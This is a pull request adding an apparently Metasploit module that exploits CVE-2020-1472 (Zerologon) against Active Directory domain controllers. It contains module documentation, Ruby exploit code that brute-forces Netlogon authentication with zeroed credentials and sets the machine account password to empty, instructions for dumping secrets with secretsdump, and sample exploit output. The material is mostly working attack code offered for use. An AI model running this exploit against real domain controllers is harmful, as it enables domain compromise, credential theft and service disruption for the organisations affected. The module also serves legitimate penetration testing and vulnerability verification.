### PR TITLE
Add exploit (aux/admin) for CVE-2020-1472 (AKA: Zerologon)

### DIFF
--- a/documentation/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.md
@@ -40,6 +40,14 @@ account password to it's original value.
 The NetBIOS name of the target domain controller. You can use the `auxiliary/scanner/netbios/nbname` module to obtain
 this value.
 
+### PASSWORD
+
+The hex value of the original machine account password. This value is typically recovered from the target system's
+registry (using a tool like secretsdump) after successfully setting the value to blank within Active Directory using
+this module and the default `REMOVE` action.
+
+This value is only used when running the module with the `RESTORE` action.
+
 ## Scenarios
 
 ### Windows Server 2019

--- a/documentation/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.md
@@ -38,7 +38,7 @@ account password to it's original value.
 ### NBNAME
 
 The NetBIOS name of the target domain controller. You can use the `auxiliary/scanner/netbios/nbname` module to obtain
-this value.
+this value. If this value is invalid the module will fail when making a Netlogon RPC request.
 
 ### PASSWORD
 

--- a/documentation/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.md
@@ -1,0 +1,54 @@
+## Vulnerable Application
+A vulnerability exists within the Netlogon authentication process where the security properties granted by AES are lost
+due to an implementation flaw related to the use of a static initialization vector (IV). An attacker can leverage this
+flaw to target an Active Directory Domain Controller and make repeated authentication attempts using NULL data fields
+which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability to reset the machine account
+password to an empty value, which will then allow the attacker to authenticate as the machine account. After
+exploitation, it's important to restore this password to it's original value. Failure to do so can result in service
+instability.
+
+Before using this module and changing the Domain Controller's machine account password, it is **highly** recommended to
+have [impacket](https://github.com/SecureAuthCorp/impacket) available to recover the original value for restoration. The
+version of impacket must have been updated on or since September 15th, 2020 to incorporate the changes introduced in
+commit [`78e8c8e4`](https://github.com/SecureAuthCorp/impacket/commit/78e8c8e41b3f163f1271a01ce3f2bf3bb880f687) which
+altered the behavior of the `example/secretsdump.py` utility to display the plaintext value of the machine account
+password. Users can use this value along with the `RESTORE` action provided by this module to restore the machine
+account password to it's original value.
+
+## Verification Steps
+
+1. Exploit the vulnerability to set the machine account password to a blank value
+    1. From msfconsole
+    1. Do: `use auxiliary/admin/dcerpc/cve_2020_1472_zerologon`
+    1. Set the `RHOSTS` and `NBNAME` values
+    1. Run the module and see that the password was set to a blank value
+1. Recover the original machine account password using impacket and secretsdump
+    1. Run `examples/secretsdump.py -no-pass NBNAME$@RHOST`
+        * **Note:** The machine name (`NBNAME` from the module) must end with the dollar sign character (`$`)
+    1. Search for the password in the output (`NBNAME$:plain_password_hex:`)
+1. Restore the original machine account password
+    1. From msfconsole
+    1. Do: `use auxiliary/admin/dcerpc/cve_2020_1472_zerologon`
+    1. Set the action to `RESTORE`
+    1. Set the `RHOSTS`, `NBNAME` and `PASSWORD` values
+    1. Run the module and see that the original value was restored
+
+## Options
+
+### NBNAME
+
+The NetBIOS name of the target domain controller. You can use the `auxiliary/scanner/netbios/nbname` module to obtain
+this value.
+
+## Scenarios
+
+### Windows Server 2019
+
+```
+[*] 192.168.159.10:0 - Connecting to the endpoint mapper service...
+[*] 192.168.159.10:49667 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.10[49667] ...
+[*] 192.168.159.10:49667 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.10[49667] ...
+[+] 192.168.159.10:49667 - Successfully authenticated
+[+] 192.168.159.10:49667 - Successfully set the machine account (WIN-3MSP8K2LCGC$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
+[*] Auxiliary module execution completed
+```

--- a/lib/msf/core/exploit/dcerpc_epm.rb
+++ b/lib/msf/core/exploit/dcerpc_epm.rb
@@ -13,6 +13,7 @@ module Exploit::Remote::DCERPC_EPM
     res = dcerpc_endpoint_list()
     return nil if not res
 
+    uuid.downcase!
     res.each do |ent|
       if (ent[:uuid] == uuid and ent[:vers] == vers and ent[:prot] == 'tcp')
         return ent[:port]
@@ -43,7 +44,8 @@ module Exploit::Remote::DCERPC_EPM
     print_status("Connecting to the endpoint mapper service...")
     begin
       eps   = nil
-      dport = datastore['RPORT'] || 135
+      dport = datastore['RPORT']
+      dport = 135 if (dport.nil? || dport == 0)
 
       begin
         eps = Rex::Socket::Tcp.create(

--- a/lib/msf/core/opt_string.rb
+++ b/lib/msf/core/opt_string.rb
@@ -10,8 +10,7 @@ module Msf
 class OptString < OptBase
 
   # This adds a length parameter to check for the maximum length of strings.
-  def initialize(in_name, attrs = [],
-               required: false, desc: nil, default: nil, enums: [], regex: nil, aliases: [], max_length: nil)
+  def initialize(in_name, attrs = [], **kwargs)
     super
   end
 

--- a/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb
+++ b/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb
@@ -52,8 +52,8 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        Opt::RPORT(0),
-        OptString.new('NBNAME', [ true, 'The server\'s NetBIOS name', '' ]),
+        OptPort.new('RPORT', [ false, 'The netlogon RPC port' ]),
+        OptString.new('NBNAME', [ true, 'The server\'s NetBIOS name' ]),
         OptString.new('PASSWORD', [ false, 'The password to restore for the machine account (in hex)' ], conditions: %w[ACTION == RESTORE]),
       ]
     )

--- a/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb
+++ b/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     response = netr_server_password_set2
-    status = response.error_status
+    status = response.error_status.to_i
     fail_with(Failure::UnexpectedReply, "Password change failed with NT status: 0x#{status.to_s(16)}") unless status == 0
 
     print_good("Successfully set the machine account (#{datastore['NBNAME']}$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)")
@@ -147,7 +147,7 @@ class MetasploitModule < Msf::Auxiliary
       ),
       clear_new_password: Netlogon.encrypt_credential(session_key, new_password_data)
     )
-    status = response.error_status
+    status = response.error_status.to_i
     fail_with(Failure::UnexpectedReply, "Password change failed with NT status: 0x#{status.to_s(16)}") unless status == 0
 
     print_good("Successfully set machine account (#{datastore['NBNAME']}$) password")

--- a/modules/auxiliary/admin/smb/cve_2020_1472_zerologon.rb
+++ b/modules/auxiliary/admin/smb/cve_2020_1472_zerologon.rb
@@ -11,8 +11,6 @@ class MetasploitModule < Msf::Auxiliary
 
   Netlogon = RubySMB::Dcerpc::Netlogon
 
-  NRPC_UUID = '12345678-1234-abcd-ef00-01234567cffb'
-
   def initialize(info = {})
     super(update_info(info,
       'Name'           => '',
@@ -21,19 +19,26 @@ class MetasploitModule < Msf::Auxiliary
       },
 
       'Author'         => [
-
+          # todo: add author credits from the references
       ],
-
+      'Notes' => {
+        'AKA' => [ 'Zerologon' ]
+      },
       'License'        => MSF_LICENSE,
+      'Actions' => [
+          [ 'REMOVE', { 'Description' => 'Remove the computer account password' } ],
+        ],
+      'DefaultAction'  => 'REMOVE',
       'References'     => [
         ['URL', 'https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py'],
+        ['URL', 'https://github.com/dirkjanm/CVE-2020-1472/blob/master/restorepassword.py']
       ]
     ))
 
     register_options(
       [
         Opt::RPORT(0),
-        OptString.new('SERVER_NAME', [ true, 'The server\'s NetBIOS name', '', true ])
+        OptString.new('SERVER_NAME', [ true, 'The server\'s NetBIOS name', '', true ]),
       ])
 
   end
@@ -41,7 +46,7 @@ class MetasploitModule < Msf::Auxiliary
   def run
     dport = datastore['RPORT']
     if dport.nil? || dport == 0
-      dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], NRPC_UUID, '1.0', 'ncacn_ip_tcp')
+      dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], Netlogon::UUID, '1.0', 'ncacn_ip_tcp')
 
       unless dport
         print_error('Could not determine the RPC port used by the Microsoft Netlogon Server')
@@ -56,37 +61,91 @@ class MetasploitModule < Msf::Auxiliary
     dcerpc_bind(handle)
     print_status("Bound to #{handle} ...")
 
-    2000.times do
-      begin
-        response = dcerpc_call(Netlogon::NetrServerReqChallengeRequest.new(
-          primary_name: "\\\\#{datastore['SERVER_NAME']}",
-          computer_name: datastore['SERVER_NAME'],
-          client_challenge: [0] * 8
-        ))
-
-        response = dcerpc_call(Netlogon::NetrServerAuthenticate3Request.new(
-          primary_name: "\\\\#{datastore['SERVER_NAME']}",
-          account_name: "#{datastore['SERVER_NAME']}$",
-          secure_channel_type: 6, # SERVER_SECURE_CHANNEL
-          computer_name: datastore['SERVER_NAME'],
-          client_credential: [0] * 8,
-          flags: 0x212fffff
-        ))
-
-        status = response.last(4).unpack('V').first
-        if status == 0
-          print_good('Successfully authenticated')
-          return
-        end
-
-      rescue ::Exception => e
-        print_error("Error: #{e}")
-      end
+    case action.name
+    when 'REMOVE'
+      action_remove_password
     end
   end
 
-  def dcerpc_call(req)
-    vprint_status("Calling #{req.class.name.split('::').last.delete_suffix('Request')}")
-    dcerpc.call(req.opnum, req.to_binary_s)
+  def action_remove_password
+    status = nil
+    2000.times do
+      netr_server_req_challenge
+      response = netr_server_authenticate3
+
+      break if (status = response.status) == 0
+    end
+
+    return unless status == 0
+    print_good('Successfully authenticated')
+
+    response = netr_server_password_set2
+    status = response.last(4).unpack('V').first
+    if status == 0
+      print_good("Successfully set the machine account (#{datastore['SERVER_NAME']}$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0")
+    else
+      print_error("Password change failed with NT status: 0x#{status.to_s(16)}")
+    end
+  end
+
+  def netr_server_authenticate3
+    nrpc_call('NetrServerAuthenticate3',
+      primary_name: "\\\\#{datastore['SERVER_NAME']}",
+      account_name: "#{datastore['SERVER_NAME']}$",
+      secure_channel_type: 6, # SERVER_SECURE_CHANNEL
+      computer_name: datastore['SERVER_NAME'],
+      client_credential: [0] * 8,
+      flags: 0x212fffff
+    )
+  end
+
+  def netr_server_password_set2
+    request = NetrServerPasswordSet2Request.new(
+      primary_name: "\\\\#{datastore['SERVER_NAME']}",
+      account_name: "#{datastore['SERVER_NAME']}$",
+      secure_channel_type: 6, # SERVER_SECURE_CHANNEL
+      computer_name: datastore['SERVER_NAME'],
+      authenticator: Netlogon::NetlogonAuthenticator.new(
+        credential: [0] * 8,
+        timestamp: 0
+      ),
+      clear_new_password: [0] * 516
+    )
+    dcerpc.call(request.opnum, request.to_binary_s)
+  end
+
+  def netr_server_req_challenge
+    nrpc_call('NetrServerReqChallenge',
+      primary_name: "\\\\#{datastore['SERVER_NAME']}",
+      computer_name: datastore['SERVER_NAME'],
+      client_challenge: [0] * 8
+    )
+  end
+
+  def nrpc_call(name, **kwargs)
+    request = Netlogon.const_get("#{name}Request").new(**kwargs)
+    Netlogon.const_get("#{name}Response").read(dcerpc.call(request.opnum, request.to_binary_s))
+  end
+
+  # [3.5.4.4.5 NetrServerPasswordSet2 (Opnum 30)](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81)
+  class NetrServerPasswordSet2Request < BinData::Record
+    # quick 'n dirty structure definition for NetrServerPasswordSet2, the primary limitation is what would be a complex,
+    # involved NL_TRUST_PASSWORD implementation to handle each of the 3 variants in which data can be stored
+    # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/52d5bd86-5caf-47aa-aae4-cadf7339ec83
+    attr_reader :opnum
+
+    endian :little
+
+    ndr_lp_str             :primary_name
+    ndr_string             :account_name
+    ndr_enum               :secure_channel_type
+    ndr_string             :computer_name
+    netlogon_authenticator :authenticator
+    array                  :clear_new_password, type: :uint8, initial_length: 516
+
+    def initialize_instance
+      super
+      @opnum = Netlogon::NETR_SERVER_PASSWORD_SET2
+    end
   end
 end

--- a/modules/auxiliary/admin/smb/cve_2020_1472_zerologon.rb
+++ b/modules/auxiliary/admin/smb/cve_2020_1472_zerologon.rb
@@ -1,0 +1,92 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Exploit::Remote::SMB::Client
+  include Msf::Auxiliary::Report
+
+  Netlogon = RubySMB::Dcerpc::Netlogon
+
+  NRPC_UUID = '12345678-1234-abcd-ef00-01234567cffb'
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => '',
+      'Description'    => %q{
+
+      },
+
+      'Author'         => [
+
+      ],
+
+      'License'        => MSF_LICENSE,
+      'References'     => [
+        ['URL', 'https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py'],
+      ]
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(0),
+        OptString.new('SERVER_NAME', [ true, 'The server\'s NetBIOS name', '', true ])
+      ])
+
+  end
+
+  def run
+    dport = datastore['RPORT']
+    if dport.nil? || dport == 0
+      dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], NRPC_UUID, '1.0', 'ncacn_ip_tcp')
+
+      unless dport
+        print_error('Could not determine the RPC port used by the Microsoft Netlogon Server')
+        # todo: switch this to a fail_with
+        return
+      end
+    end
+
+    # Bind to the service
+    handle = dcerpc_handle(Netlogon::UUID, '1.0', 'ncacn_ip_tcp', [dport])
+    print_status("Binding to #{handle} ...")
+    dcerpc_bind(handle)
+    print_status("Bound to #{handle} ...")
+
+    2000.times do
+      begin
+        response = dcerpc_call(Netlogon::NetrServerReqChallengeRequest.new(
+          primary_name: "\\\\#{datastore['SERVER_NAME']}",
+          computer_name: datastore['SERVER_NAME'],
+          client_challenge: [0] * 8
+        ))
+
+        response = dcerpc_call(Netlogon::NetrServerAuthenticate3Request.new(
+          primary_name: "\\\\#{datastore['SERVER_NAME']}",
+          account_name: "#{datastore['SERVER_NAME']}$",
+          secure_channel_type: 6, # SERVER_SECURE_CHANNEL
+          computer_name: datastore['SERVER_NAME'],
+          client_credential: [0] * 8,
+          flags: 0x212fffff
+        ))
+
+        status = response.last(4).unpack('V').first
+        if status == 0
+          print_good('Successfully authenticated')
+          return
+        end
+
+      rescue ::Exception => e
+        print_error("Error: #{e}")
+      end
+    end
+  end
+
+  def dcerpc_call(req)
+    vprint_status("Calling #{req.class.name.split('::').last.delete_suffix('Request')}")
+    dcerpc.call(req.opnum, req.to_binary_s)
+  end
+end


### PR DESCRIPTION
This adds an exploit module for CVE-2020-1472, AKA Zerologon. This is a pure-Ruby implementation, leveraging the changes proposed in rapid7/ruby_smb#164. This module is capable of:
* Identifying the vulnerability through the standard `check` method
* Exploiting the vulnerability to set the machine account password to a blank value (using the `REMOVE` action)
* Restoring the machine account password to a specific value such as one recovered using secretsdump (using the `RESTORE` action)

Within the module, I maintained the 2000 attempt account. This was reliably successful for me when I tested against both Server 2016 and Server 2019 installations. The TCP port of the remote Netlogon service is automatically determined using the DCERPC mapping, however a user can explicitly specify a non-zero value instead.

The netlogon implementation I wrote is the bare minimum that was required to develop the module. I put the parts that are reusable into ruby_smb for the next time we need them. The `NetrServerPasswordSet2Request` is local to the module because of the `NT_TRUST_PASSWORD` structure which can be in [different formats](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/52d5bd86-5caf-47aa-aae4-cadf7339ec83) depending on conditions I'm not even entirely sure of. This structure is likely not reusable and that's why it's local to the module.

Possible future work:
* Automatic `NBNAME` identification. It currently doesn't look like Metasploit has a suitable library for this purpose and the code in `auxiliary/scanner/netbios/nbname` does not look easily repurposed.
* Automatic machine account password recovery. PR #13995 implements quite a bit of this already ~~but does not appear to be working with the machine account at this time. Further testing here would be necessary.~~ **Update:** Based on my testing the Metasploit `windows_secrets_dump` module is working as intended against my Server 2016 Domain Controller, but neither this Metasploit module nor the original impacket secretsdump tool are working against my Server 2019 Domain Controller. I suspect that either there's a difference in the authentication between these two versions or my 2019 Server is somehow configured differently.

## dcerpc_epm Changes
This PR includes a couple of changes to the `lib/msf/core/exploit/dcerpc_epm.rb` file. First it normalizes the user's specified UUID value. UUIDs are not case sensitive and the ones generated by processing the server response are all lowercase. This fixes an issue that took me a few minutes to identify since I had passed my UUID in originally using all caps. Additionally, this checks the `datastore['RPORT']` value a little more thoroughly. Since zero evaluates to true in Ruby it should also be treated as automatic (like `nil` is) in which case the default of 135 should be used

## Verification

Testing requires the changes from rapid7/ruby_smb#164. To test that locally use the `Gemfile.local` with the following contents, (update the path as appropriate) and then run `bundle install --gemfile Gemfile.local`.

<details>
<summary>Gemfile.local</summary>

```
# Include the original gemfile
orig_gemfile = File.join(File.dirname(__FILE__), 'Gemfile')
if File.readable?(orig_gemfile)
  instance_eval(File.read(orig_gemfile))
end

# Create a custom group
group :local do
  gem 'ruby_smb', path: '/path/to/ruby_smb'
end
```
</details>

1. Exploit the vulnerability to set the machine account password to a blank value
    1. From msfconsole
    - [x] Do: `use auxiliary/admin/dcerpc/cve_2020_1472_zerologon`
    - [x] Set the `RHOSTS` and `NBNAME` values
    - [x] Run the module and see that the password was set to a blank value
1. Recover the original machine account password using impacket and secretsdump
    - [x] Run `examples/secretsdump.py -no-pass NBNAME$@RHOST`
        * **Note:** The machine name (`NBNAME` from the module) must end with the dollar sign character (`$`)
    - [x]  Search for the password in the output (`NBNAME$:plain_password_hex:`)
1. Restore the original machine account password
    1. From msfconsole
    - [x]  Do: `use auxiliary/admin/dcerpc/cve_2020_1472_zerologon`
    - [x] Set the action to `RESTORE`
    - [x]  Set the `RHOSTS`, `NBNAME` and `PASSWORD` values
    - [x]  Run the module and see that the original value was restored


## Example

```
[*] 192.168.159.10:0 - Connecting to the endpoint mapper service...
[*] 192.168.159.10:49667 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.10[49667] ...
[*] 192.168.159.10:49667 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.10[49667] ...
[+] 192.168.159.10:49667 - Successfully authenticated
[+] 192.168.159.10:49667 - Successfully set the machine account (WIN-3MSP8K2LCGC$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
[*] Auxiliary module execution completed
```